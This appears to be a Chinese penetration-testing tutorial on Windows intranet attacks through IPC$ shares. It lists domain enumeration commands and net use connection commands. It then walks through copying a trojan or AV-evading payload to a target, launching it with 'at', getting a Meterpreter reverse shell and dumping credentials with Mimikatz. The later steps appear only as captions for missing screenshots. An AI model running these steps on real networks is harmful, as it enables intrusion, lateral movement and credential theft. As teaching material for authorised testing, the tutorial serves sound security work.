内网渗透之_内网IPC$入侵
一、域操作相关的命令
1.查看域用户
net user/domain2.查看有几个域
net view/domain3.查看域内的主机
net view/domain: XXX4.查看域里面的组
net group/domain5.查看域内所有的主机名
net group "domain computers" /domain6.查看域管理员
net group "domain admins" /domain7.查看域控制器
net group "domain controllers" /domain8.查看企业管理组
net group "enterprise admins" /domain9.查看时间服务器
net time/domain二、IPC$入侵
ipc$使用的端口
首先我们来了解一些基础知识:
SMB: (Server Message Block) Windows协议族,用于文件打印共享的服务;
NBT: (NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。
在WindowsNT中SMB基于NBT实现,即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现IPC$入侵,即通过使用Windows系统默认启动的IPC$共享获得计算机控制权的入侵,在内网中及其常见。
假设现在有一台IPC$主机:127.0.0.25,输入以下命令。
#连接127.0.0.25的IPC$共享:
D:>net use \127.0.0.25\ipc$
#复制srv.exe到目标主机
D:>copy srv.exe \127.0.0.25\ipc$
#查时间
D:>net time\127.0.0.25
#用at命令在10点50分启动srv.exe(注意这里设置的时间比主机时间快)
D:>at \127.0.0.25 10:50 srv.exe
上述命令中的at就是让计算机在指定的时间做指定事情的命令(例如运行程序)补充
建立ipc$空连接:net use \\10.96.10.59\ipc$ "密码" /user:""
建立ipc$非空连接: net use \\10.96.10.59\ipc$ "密码" /user:"用户名"
删除ipc$连接: net use \\10.96.10.59\ipc$ /del
如果已经建立了ipc$连接而且有权限的话,把目标主机的C盘映射到本地的Z盘:net use z: \\10.96.10.59\c$
取消映射: net use z: /del
ps:如果在域内,抓到域管理员的账号密码
建立IPC的时候可以使用域管的账号密码进行连接这里把免杀的Payload上传到PAVMSEP131服务器,然后利用at命令启动Payload,反弹回Meterpreter Shell
将木马复制到目标服务器
查看系统时间
使用at命令启动木马
接着返回handler监听,可以看到反弹成功了,我们获得了PAVMSEP131服务器的Meterpreter Shell
反弹成功
下面看看PAVMSEP131服务器的信息和现在的权限
查看系统信息
可以看到有SYSTEM权限,说明既可以使用Mimikatz等工具,也可以输入 run post/windows/gather/hashdump来抓Hash
在用Mimikatz抓Hash前要注意一点:如果服务器安装的是64位操作系统,要把Mimikatz的进程迁移到一个64位的程序进程中,才能查看64位操作系统的密码明文,在32位系统中就没有这个限制。
这里使用Mimikatz抓Hash
上传Mimikatz
抓取Hash
查看抓到的域用户的权限
作者:冰 河
来源:CSDN
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-01-15,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读